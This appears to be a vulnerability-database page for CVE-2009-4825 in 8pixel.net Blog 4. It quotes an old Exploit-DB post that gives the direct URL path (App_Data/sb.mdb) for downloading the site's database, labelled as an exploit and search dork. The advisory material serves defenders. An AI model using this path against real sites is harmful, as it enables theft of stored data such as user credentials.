CVE-2009-4825
Description
8pixel.net Blog 4 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for App_Data/sb.mdb.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
8Pixel.net 2009. - Database Disclosure
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
/_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[�] ~ Note : Forever RevengeHack.Com
==============================================================================
[�] 8pixel.net 2009. Database Disclosure Vulnerability
==============================================================================
[�] Script: [ 8pixel.net 2009. ]
[�] Language: [ ASP ]
[�] Download: [ http://www.8pixel.net/downloads.aspx ]
[�] Founder: [ LionTurk - Bylionturk@kafam1milyon.com (Mail G�nderenin aq... :D ]
[�] My Home: [ RevengeHack.com , Ar-ge.Org]
###########################################################################
===[ Exploit And Dork ]===
[�] http://[target].com/[path]/App_Data/sb.mdb
[�] ( c ) 8pixel.net 2009. All Rights Reserved or 8pixel.net Blog v4
Author: LionTurk <-
Thanks You: eXceptioN,CodeInside
I Love Fenerbah�e
I Love T�rkiye
I Love Mustafa K. ATAT�RK
###########################################################################
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| 8pixel | simple_blog | 4.0 | |
References
- http://osvdb.org/61227
- http://secunia.com/advisories/37846
- http://www.exploit-db.com/exploits/10573
- https://exchange.xforce.ibmcloud.com/vulnerabilities/54938
- http://osvdb.org/61227
- http://secunia.com/advisories/37846
- http://www.exploit-db.com/exploits/10573
- https://exchange.xforce.ibmcloud.com/vulnerabilities/54938
CWEs
CWE-264
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.